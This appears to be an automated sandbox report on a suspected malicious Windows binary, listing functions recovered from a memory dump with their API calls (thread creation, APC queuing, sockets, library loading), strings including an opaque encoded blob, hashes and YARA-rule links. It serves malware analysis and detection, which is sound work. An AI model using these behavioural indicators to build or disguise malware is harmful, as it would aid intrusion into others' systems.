API ID: CriticalH_prologSectionTimerWaitable$CreateEnterErrorLastLeave
String ID: timer
API String ID: 80991882-1792073242
Opcode ID: 17fe8ad99e405f6a08de1784b28ce600328c0de83fe899afd959e253062f75be
Instruction ID: 3d12fd47e9e49450431f38a7a975eb8fb3334f85ebb861518eb8ef93f317d798
Opcode Fuzzy Hash: 17fe8ad99e405f6a08de1784b28ce600328c0de83fe899afd959e253062f75be
Instruction Fuzzy Hash: 053180B0D01644DFDB04DF69C884BEEBBF9EF49310F10816EE845A7241D7B88A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004AA0C8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AA0CD
std::_Lockit::_Lockit.LIBCPMT ref: 004AA0DC

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Getfacet.LIBCPMT ref: 004AA0FC
__CxxThrowException@8.LIBVCRUNTIME ref: 004AA133
std::_Facet_Register.LIBCPMT ref: 004AA149
std::_Lockit::~_Lockit.LIBCPMT ref: 004AA156

Strings

|m, xrefs: 004AA0D6

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: |m
API String ID: 1252875284-1421393795
Opcode ID: 36998aef73eb7e7b322449e0f8b89fe154fd5dccf7923ae5a283159f4edfe117
Instruction ID: 6ec8eaabeddcd1618dbc1e8d3d26a91558b9d6a6e7710c7514235d19a62cc3eb
Opcode Fuzzy Hash: 36998aef73eb7e7b322449e0f8b89fe154fd5dccf7923ae5a283159f4edfe117
Instruction Fuzzy Hash: 3B11C172A002299BCF14EFA4D805AEE7775EF85760F10465EE814A72A1EB389A01C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 0056C747, Relevance: 12.2, APIs: 8, Instructions: 208COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0056C74C
new.LIBCMT ref: 0056C792

Part of subcall function 0056D435: __EH_prolog.LIBCMT ref: 0056D43A
Part of subcall function 0056D435: _strlen.LIBCMT ref: 0056D471

new.LIBCMT ref: 0056C7DC
new.LIBCMT ref: 0056C830
new.LIBCMT ref: 0056C87A
new.LIBCMT ref: 0056C8C9
new.LIBCMT ref: 0056C913

Part of subcall function 00680AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00680B0F

Part of subcall function 005701FF: __EH_prolog.LIBCMT ref: 00570204
Part of subcall function 005701FF: _strlen.LIBCMT ref: 00570226

new.LIBCMT ref: 0056C95F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen$Concurrency::cancel_current_task
String ID:
API String ID: 194979272-0
Opcode ID: 5cec0c765228ae5f0f4d02430d0f3a6a238138c76bae73fe1ae54e8dc0183e56
Instruction ID: 14ffb8582634386fc82cf17da935bcf3b292f996a25e992b78d83ec25e0b9b1c
Opcode Fuzzy Hash: 5cec0c765228ae5f0f4d02430d0f3a6a238138c76bae73fe1ae54e8dc0183e56
Instruction Fuzzy Hash: C1818D70D4534ADECB45EFB889156EDBFB4BF55300F1484AEE240AB282DB748A04DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 006A3548, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000001,00000001,00000001,?,?,?,006A3799,00000001,00000001,?), ref: 006A35A2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006A3799,00000001,00000001,?,00000001,?,?), ref: 006A3628
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000001,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006A3722
__freea.LIBCMT ref: 006A372F

Part of subcall function 00697D9E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006A1A7D,00001000,00000000,?,?,?,0069753B,00000000,00000000,00000000,?,?), ref: 00697DD0

__freea.LIBCMT ref: 006A3738
__freea.LIBCMT ref: 006A375D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 853f05da59ad018e205bf18081d07606692e75025c2cc224698217167ad8c810
Instruction ID: cd0d0aef3957dffa610732502916bef9f0979c51aa3ce93d2106b75626cbf92e
Opcode Fuzzy Hash: 853f05da59ad018e205bf18081d07606692e75025c2cc224698217167ad8c810
Instruction Fuzzy Hash: 1351E3B2A00226ABDB25AF64DC45EFB77ABEF42750F144629FD05D6340EB34DE40CA64

Uniqueness

Uniqueness Score: -1.00%

Function 006A0BBE, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0068BA4F,0077A468,00000010), ref: 006A0BC2
_free.LIBCMT ref: 006A0BF5
_free.LIBCMT ref: 006A0C1D
SetLastError.KERNEL32(00000000), ref: 006A0C2A
SetLastError.KERNEL32(00000000), ref: 006A0C36
_abort.LIBCMT ref: 006A0C3C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 5cbccf2ec746fc6395dc3166b6b575f8ea0147201b3644236bc7e4bb9d042095
Instruction ID: a3c49d9c97eb9abf4e5523c122bc2db6f79bb6e9e60c19d617dd198d7e22cff2
Opcode Fuzzy Hash: 5cbccf2ec746fc6395dc3166b6b575f8ea0147201b3644236bc7e4bb9d042095
Instruction Fuzzy Hash: 72F0443699860266E70233346E0AF5E265F8FC3731F200219FA06D2692EE758C038A79

Uniqueness

Uniqueness Score: -1.00%

Function 00416021, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 00416039
_strlen.LIBCMT ref: 00416066
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 00416087
WSAStringToAddressW.WS2_32(?,?,00000000,?,00000080), ref: 0041609C

Strings

255.255.255.255, xrefs: 004160D1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressByteCharErrorLastMultiStringWide_strlen
String ID: 255.255.255.255
API String ID: 211062275-2422070025
Opcode ID: 1f04952744154bd24812894aceee2d9f310019820355fa6d513936dcd10ed0a4
Instruction ID: 45b6e31451a696ebdf8162b1767b6627ffe4b77538a480277cbf2d8a7ccc63e0
Opcode Fuzzy Hash: 1f04952744154bd24812894aceee2d9f310019820355fa6d513936dcd10ed0a4
Instruction Fuzzy Hash: 6241F631A00215BBDB209F64CC82BEABB65AF05730F21831AF964972D2C774AD808BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0069C86C, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0069C8DE
_free.LIBCMT ref: 0069C8FE

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3cbf1aa78a68228950788c115d416e17b48c51f98c525e5944610e977fc8d383
Instruction ID: 568b4ea377fdd5330b7526d0f557bfad17c2e5c22e8771228f9b8a5404a3a910
Opcode Fuzzy Hash: 3cbf1aa78a68228950788c115d416e17b48c51f98c525e5944610e977fc8d383
Instruction Fuzzy Hash: 1F41C432A002049FDF24DF78C981A99B7FAEF85724F154569E915EB781E731AD02CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004139F1, Relevance: 7.6, APIs: 5, Instructions: 128timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004139F6

Part of subcall function 00413C4E: __EH_prolog.LIBCMT ref: 00413C53
Part of subcall function 00413C4E: GetTickCount64.KERNEL32(?,?,00000000), ref: 00413C70

GetSystemTimes.KERNEL32 ref: 00413A60
GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00413A7A
GetProcessTimes.KERNELBASE(00000000), ref: 00413A81
GetTickCount64.KERNEL32(?,00795BE0,?,00795BD8,?,00795BD0,?,00795BC8), ref: 00413B79

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Count64H_prologProcessTickTimes$CurrentSystem
String ID:
API String ID: 2284428309-0
Opcode ID: 166c6087c2440a790dc45eb80621aa69fac31f17c9776db3ebe74335e0106ef6
Instruction ID: dedbf5ab10423884d2463da0fe5e45a3e038a9486860fcb153a760f40e7fbaf5
Opcode Fuzzy Hash: 166c6087c2440a790dc45eb80621aa69fac31f17c9776db3ebe74335e0106ef6
Instruction Fuzzy Hash: 1E512BB1D056289FCB05DFE9D9819DEBBB8FF08341B54812BE505E3211E7385A86CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004147B3, Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004147B8
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0041F64C,?,0041F67A,?,?,?,?,0041F0E7,?), ref: 004147C8
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041F64C,?,0041F67A,?,?,?,?,0041F0E7,?), ref: 004147F6
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041F64C,?,0041F67A,?,?,?,?,0041F0E7,?), ref: 0041481F
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0041F64C,?,0041F67A,?,?,?,?,0041F0E7), ref: 00414869

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 8fdaed5f7c015fe9c596e14a11157c45507024964963db78a75e272a6236ec80
Instruction ID: 13efd0fbe7da5596678df0606f44014a84a54d848637f257077e134b5a9e488a
Opcode Fuzzy Hash: 8fdaed5f7c015fe9c596e14a11157c45507024964963db78a75e272a6236ec80
Instruction Fuzzy Hash: 7A31A979A00685DFCB10CF28C844B9ABBB5FF89710F14864EE82597341C7B4EA41CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00414A42, Relevance: 7.5, APIs: 5, Instructions: 36synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32 ref: 00414A60
CloseHandle.KERNEL32(?), ref: 00414A69
TerminateThread.KERNEL32(?,00000000), ref: 00414A83
QueueUserAPC.KERNELBASE(00414A15,?,00000000), ref: 00414A90
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00414A9B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 3892215915-0
Opcode ID: 5e3e5d901a608c263f5a7cebda31382c350fafe2ac7b73e32475c38ddc19fed6
Instruction ID: 02003f10f6ab72df4e18e5c6eec2cd413363acaec7b802c44c6d24bfc3e12ecd
Opcode Fuzzy Hash: 5e3e5d901a608c263f5a7cebda31382c350fafe2ac7b73e32475c38ddc19fed6
Instruction Fuzzy Hash: 3AF06830945604FFDB105F64DC09B9A7BE9EF08721F10425AF52AD56E0DB716C408B95

Uniqueness

Uniqueness Score: -1.00%

Function 0068BC0A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,?,Function_0028BA2A,00000000,?,00000000), ref: 0068BC53
GetLastError.KERNEL32(?,?,?,00414B76,00000000,00000000,00414BED), ref: 0068BC5F
__dosmaperr.LIBCMT ref: 0068BC66

Strings

KA, xrefs: 0068BC2D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID: KA
API String ID: 2744730728-4133974868
Opcode ID: f03f4714b120c0d2260c96cf6850c6dfecc8c05f8600240f4b76256747474cb3
Instruction ID: 025e5160260aac0e4f3a92f7803d62a48f5ff617fadab46e5574becf89812903
Opcode Fuzzy Hash: f03f4714b120c0d2260c96cf6850c6dfecc8c05f8600240f4b76256747474cb3
Instruction Fuzzy Hash: 9E019E32501519ABCF25BFA1DC05DEF3F6BEF85320B011229F91587610DF718911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 006A262D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNELBASE ref: 006A2680
LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00000001,?,00000001,00000001,00000000), ref: 006A269E

Strings

LCMapStringEx, xrefs: 006A2648
0A, xrefs: 006A267A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: String
String ID: 0A$LCMapStringEx
API String ID: 2568140703-1140958291
Opcode ID: 753ba94e36c16b2007f4fa131f08aadf0003122d05dc175d229b40dc3ddd0047
Instruction ID: 8f7a8ac9c0e874e10e02c2c66bc4f3061c6d0de80b33f6c256d115ca56c7a5a1
Opcode Fuzzy Hash: 753ba94e36c16b2007f4fa131f08aadf0003122d05dc175d229b40dc3ddd0047
Instruction Fuzzy Hash: 85011732541109BBCF026F94CC05DEE3F66EF1A754F054115FE052A260C6768971EB84

Uniqueness

Uniqueness Score: -1.00%

Function 0042132E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCONCRT ref: 00421336

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

__CxxThrowException@8.LIBVCRUNTIME ref: 00421353

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

Ltm, xrefs: 0042134A
bad locale name, xrefs: 0042132E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8RaiseThrow___std_exception_copystd::exception::exception
String ID: Ltm$bad locale name
API String ID: 4055469071-2471048373
Opcode ID: 86b61d2feaa06cfcd833050e73023eea12b3ccbbab6f2c995b6da0a9e20b2b4b
Instruction ID: ba6f07ba22d3f680c7b04beb8eb05f876847e82244634e921f29b5aa14a945c2
Opcode Fuzzy Hash: 86b61d2feaa06cfcd833050e73023eea12b3ccbbab6f2c995b6da0a9e20b2b4b
Instruction Fuzzy Hash: EEE0E571D0528DEACB05EF94D905BDDFB75EB04324F20C26AE014672C2C7791601D785

Uniqueness

Uniqueness Score: -1.00%

Function 0056912E, Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00569133
new.LIBCMT ref: 00569160
RtlInitializeCriticalSection.NTDLL(0000001C,00000000,00797420,?,?,00569880,?,?,?,0040F0A6), ref: 00569183
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00569880,?,?,?,0040F0A6), ref: 0056919A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateCriticalEventH_prologInitializeSection
String ID:
API String ID: 3158263371-0
Opcode ID: dc10bd1624971c821cf25d3c5956cbef8b80f37fa3717023bc06ff32207e8d94
Instruction ID: f08e23a47fe0b1e1402390d4541d1dd9a58de5f85cd406617624f3d28a9496c4
Opcode Fuzzy Hash: dc10bd1624971c821cf25d3c5956cbef8b80f37fa3717023bc06ff32207e8d94
Instruction Fuzzy Hash: 103144B08017009FDBA4DF68C8847967BE5FF08310F1046AEEC19DF28AE7B19548CB94

Uniqueness

Uniqueness Score: -1.00%

Function 006A1F7D, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,006A1F24,?,00000000,00000000,00000000,?,006A2250,00000006,FlsSetValue), ref: 006A1FAF
GetLastError.KERNEL32(?,006A1F24,?,00000000,00000000,00000000,?,006A2250,00000006,FlsSetValue,00714538,00714540,00000000,00000364,?,006A0C90), ref: 006A1FBB
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006A1F24,?,00000000,00000000,00000000,?,006A2250,00000006,FlsSetValue,00714538,00714540,00000000), ref: 006A1FC9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 3336d0363b0d1277d113748c3f7fff5fb31030d617126b995d9b956338042c19
Instruction ID: 0ec638b8ae983a4c08756af6bd5145126569c19d03f1c2af8e7bba2147f914fc
Opcode Fuzzy Hash: 3336d0363b0d1277d113748c3f7fff5fb31030d617126b995d9b956338042c19
Instruction Fuzzy Hash: D101FC32616662AFC7315A699C44EA677DAAF077A1F210524F916DB280D760DD01CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 00414BED, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414BF2
SetEvent.KERNEL32(00000000), ref: 00414C06
SetEvent.KERNEL32(?), ref: 00414C23
SleepEx.KERNELBASE(000000FF,00000001), ref: 00414C2D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Event$H_prologSleep
String ID:
API String ID: 1765829285-0
Opcode ID: 1190111deaea89fa6db9a9d5df70ac53f365eb90f77e91f7e88fb18ea6a56883
Instruction ID: 9da58206ea6e4e3eb0070f73a500b79a91363b4be50457d16d78ad4f8da008e0
Opcode Fuzzy Hash: 1190111deaea89fa6db9a9d5df70ac53f365eb90f77e91f7e88fb18ea6a56883
Instruction Fuzzy Hash: 6BF06231A01614EFCB10DF98D899B98BBB5FF09322F108269F51A9B2D1C7349A40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00415944, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 0041599B
closesocket.WS2_32 ref: 00415A06

Strings

g:\, xrefs: 004159FC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: closesocket
String ID: g:\
API String ID: 2781271927-4121806609
Opcode ID: af5f35578835f3c436a4473cc4fbafab2253812c51e60b50a5d3982c8b72eb4a
Instruction ID: b1e1d38c966291d7ba6df09bccc8acda0f6d45625b17477f5995a09d82777a4c
Opcode Fuzzy Hash: af5f35578835f3c436a4473cc4fbafab2253812c51e60b50a5d3982c8b72eb4a
Instruction Fuzzy Hash: 0F210871910219EBCB10EB64CC85BFEB7B9AF80724F04826BEC14A72C1EB784E45C795

Uniqueness

Uniqueness Score: -1.00%

Function 0041F572, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041F577

Strings

RLA, xrefs: 0041F5B7
IA, xrefs: 0041F58C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: RLA$IA
API String ID: 3519838083-3098375642
Opcode ID: a51af9b66fa29a8804961d4f0b6f6d3e7cfc64ba6c9138da2710ccf716b2a0cd
Instruction ID: 9641d5ab02b994db1dc217116a9365d7fad60ce60dbb0e251cd473c2b2568d20
Opcode Fuzzy Hash: a51af9b66fa29a8804961d4f0b6f6d3e7cfc64ba6c9138da2710ccf716b2a0cd
Instruction Fuzzy Hash: 2F2110B0901606DFC704CF5AD284689FFF5FF59310B6085BED0589B761D3B49A54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0068BA2A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0077A468,00000010), ref: 0068BA3D
ExitThread.KERNEL32 ref: 0068BA44

Strings

0A, xrefs: 0068BA79

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorExitLastThread
String ID: 0A
API String ID: 1611280651-538879246
Opcode ID: 5c2d5a4afffbb0c5d212df3bfd51e4e544bc2dee271e6e60a47cf6c25dc4c439
Instruction ID: 24547f008b4913caee9b784aa2ff0c45e3990639c8d6e482cdaafb0397bf1ea2
Opcode Fuzzy Hash: 5c2d5a4afffbb0c5d212df3bfd51e4e544bc2dee271e6e60a47cf6c25dc4c439
Instruction Fuzzy Hash: 42F0AFB1940604AFDB04BF74C90AAAD7B77FF45740F10014DF4125B2A2CBB5A941DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414FC6, Relevance: 4.6, APIs: 3, Instructions: 116timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414FCB
SetWaitableTimer.KERNELBASE ref: 00414FFA
GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 004150BA

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CompletionH_prologQueuedStatusTimerWaitable
String ID:
API String ID: 2995059299-0
Opcode ID: 0ac0ce651cb377dfbb175b24da3ce17a58921678237f33f2ad5b0d9346e57284
Instruction ID: 324d2f80a88f3ea353461f4b1c74fa94218da9e8efc213fb463ba8b511415384
Opcode Fuzzy Hash: 0ac0ce651cb377dfbb175b24da3ce17a58921678237f33f2ad5b0d9346e57284
Instruction Fuzzy Hash: 2A416972900A0ACFCB15DF91C880BEFB7B9FF88315F00052ED412A6641DB78A949CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00416484, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416489
EnterCriticalSection.KERNEL32(?,?), ref: 004164A6
LeaveCriticalSection.KERNEL32(?), ref: 004164E5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$EnterH_prologLeave
String ID:
API String ID: 367238759-0
Opcode ID: 09bd8116747df04181498dc955d71804d03fa7967c9e664b1d115c34ea8147be
Instruction ID: 6c873a38d2a90f09fa4f24cee6f94c7ef67355486a044a14df9f464434e99882
Opcode Fuzzy Hash: 09bd8116747df04181498dc955d71804d03fa7967c9e664b1d115c34ea8147be
Instruction Fuzzy Hash: 02015BB1A01B04ABC728DF2AD54099BBBF4FF48710B10462EE44A83B01C730EA44CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0068BADE, Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON

Download Yara Rule

APIs

Part of subcall function 006A0C42: GetLastError.KERNEL32(?,?,?,00692DE2,00697424,?,006A0BEC,00000001,00000364,?,0068BA4F,0077A468,00000010), ref: 006A0C47
Part of subcall function 006A0C42: _free.LIBCMT ref: 006A0C7C
Part of subcall function 006A0C42: SetLastError.KERNEL32(00000000), ref: 006A0CB0

ExitThread.KERNEL32 ref: 0068BAF0
CloseHandle.KERNEL32(?), ref: 0068BB18
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,0068BC9C,?,?,0068BA87,00000000), ref: 0068BB2E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: c6654b4a739282c16a0e6edcb0fa1cc6af5d00759c53113681575545dbbe3f1b
Instruction ID: 6966db663efffd20d22127c944544b1dd1ee1576539e8625fc2a3267a28982a3
Opcode Fuzzy Hash: c6654b4a739282c16a0e6edcb0fa1cc6af5d00759c53113681575545dbbe3f1b
Instruction Fuzzy Hash: FDF05E30900B046BCB357B35C849A9B7B9BAF01764F496715F876D26A1EB70DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00449F62, Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00449F67

Part of subcall function 0044A238: __EH_prolog.LIBCMT ref: 0044A23D
Part of subcall function 0044A238: new.LIBCMT ref: 0044A263
Part of subcall function 0044A238: GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 0044A28A
Part of subcall function 0044A238: GetProcAddress.KERNEL32(?,?,?,?,00000000), ref: 0044A2F6

GetTickCount64.KERNEL32(?,?,00000000), ref: 00449F8D
GetTickCount.KERNEL32(?,?,00000000), ref: 00449F95

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologTick$AddressCountCount64HandleModuleProc
String ID:
API String ID: 698623096-0
Opcode ID: 9438e9549d5a1ae20d185e7b2a89a909ae2f123e9faf7450a445faf27c5ccd9e
Instruction ID: d432c72c9ae12bae8ab774f7184c4cfd7b94f21e20409f6f14a24889351864e5
Opcode Fuzzy Hash: 9438e9549d5a1ae20d185e7b2a89a909ae2f123e9faf7450a445faf27c5ccd9e
Instruction Fuzzy Hash: 15F08C75E022489FDB10AFAA99842DEFFB4FB04305F5081AFE809E2201C7340A049AA6

Uniqueness

Uniqueness Score: -1.00%

Function 004A65FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004A6600

Strings

R8J, xrefs: 004A662E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: R8J
API String ID: 3519838083-300890041
Opcode ID: a75301ac05869b08e87e3c074f6e5d557cfcd722ebe09639ff37f16f3d900abd
Instruction ID: 5867a854888093d1bee9642c589902deb2e61eb9fb30700b447e8a0783e2703a
Opcode Fuzzy Hash: a75301ac05869b08e87e3c074f6e5d557cfcd722ebe09639ff37f16f3d900abd
Instruction Fuzzy Hash: B6111771A00249DFCB25DF68C904BAABBF5FF09314F1086AEE89997351D3B59A51CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00415DA9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415DBC

Strings

]:\, xrefs: 00415DEF

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Socket
String ID: ]:\
API String ID: 38366605-3696338775
Opcode ID: 57d7dbeec8d167821e799577697ec5d73d98e76d53c9775f6d16ba8d974a0e8c
Instruction ID: e7609cce014b81f21ff3b1dd31470b4c38d175c626fe43516bd185cf584de9ae
Opcode Fuzzy Hash: 57d7dbeec8d167821e799577697ec5d73d98e76d53c9775f6d16ba8d974a0e8c
Instruction Fuzzy Hash: 3AF0E23A651718BBEA3056189C4AFEE7769C789B31F104217FE20A72C0C6F45E4186E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A257, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040A25E

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

/coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040A258, 0040A25D, 0040A265

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
